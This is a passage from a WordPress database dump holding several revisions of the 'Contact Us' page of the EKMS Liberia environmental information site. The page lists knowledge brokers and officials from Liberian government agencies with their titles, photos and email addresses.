https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 10:46:44','2022-09-20 10:46:44','',80,'https://ekmsliberia.info/?p=5088',0,'revision','',0),(5089,42,'2022-09-20 10:46:44','2022-09-20 10:46:44','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 10:46:44','2022-09-20 10:46:44','',80,'https://ekmsliberia.info/?p=5089',0,'revision','',0),(5090,42,'2022-09-20 10:46:45','2022-09-20 10:46:45','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, 